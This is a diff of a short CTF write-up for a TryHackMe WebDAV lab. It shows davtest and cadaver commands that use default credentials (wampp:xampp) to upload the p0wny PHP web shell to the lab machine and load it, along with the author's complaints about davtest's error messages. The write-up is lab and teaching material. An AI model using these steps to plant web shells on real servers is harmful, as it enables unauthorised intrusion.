ChrisPritchard/ctf-writeups/tryhackme/dav.md

 So, I can upload files and I can upload PHP files, which are fully executable.
 I downloaded a copy of https://github.com/flozz/p0wny-shell/blob/master/shell.php and got to work.

 Surprisingly, `davtest` despite having an `uploadfile` arg and showing in the above test it could upload, wasn't working.
-I tried this: `davtest -url http://10.10.119.10/webdav -auth wampp:xampp -uploadfile shell.php -uploadloc http://10.10.119.10/webdav/shell.php` and it failed.
-After I rooted the machine later (while writing this) I did more investigation: the latter path is relative to the dir so this would have worked: `davtest -url http://10.10.119.10/webdav -auth wampp:xampp -uploadfile shell.php -uploadloc shell.php`.
+I tried this: `davtest -url http://10.10.119.10/webdav -auth wampp:xampp -uploadfile shell.php -uploadloc http://10.10.119.10/webdav/shell.php` and it failed with no diagnostic error.
+I switched away largely because the errors were done (just said FAILED, come on devs).

+    > After I rooted the machine later (while writing this) I did more investigation: the latter path is relative to the dir so this would have worked: "davtest -url http://10.10.119.10/webdav -auth wampp:xampp -uploadfile shell.php -uploadloc shell.php".
 Obvious really.
+Still needs better error messages, or help that says something like "upload path RELATIVE to webdav root".

 Instead, I used `cadaver http://10.10.119.10/webdav` which provides an FTP like experience.
 I used that to upload the shell via `put shell.php`.
 Navigated to `http://10.10.119.10/webdav/shell.php` and it loaded up nicely.